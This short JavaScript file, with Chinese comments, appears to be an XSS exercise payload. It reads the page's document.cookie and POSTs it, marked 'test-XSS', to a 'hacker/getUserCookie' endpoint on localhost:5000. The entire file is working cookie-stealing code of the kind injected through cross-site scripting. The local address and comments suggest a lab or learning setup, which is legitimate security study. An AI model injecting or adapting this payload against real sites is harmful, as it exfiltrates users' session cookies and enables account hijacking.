
const cookie = document.cookie;

const xhr = new XMLHttpRequest();
const url = 'http://localhost:5000/hacker/getUserCookie';
console.log(url)

// 配置请求
xhr.open('POST', url, true);

// 设置请求头，表明请求体是 JSON 格式
xhr.setRequestHeader('Content-Type', 'application/json');

// 准备要发送的 JSON 数据
const data = {
    content: 'test-XSS',
    cookie: cookie,
};

// 将 JavaScript 对象转换为 JSON 字符串
const jsonData = JSON.stringify(data);
console.log(jsonData)
// 监听状态变化
xhr.onreadystatechange = function () {
    // 当请求完成且状态码为 200 时
    if (xhr.readyState === 4 && xhr.status === 200) {
        console.log(xhr.responseText);
    }
};
// 发送请求
xhr.send(jsonData);




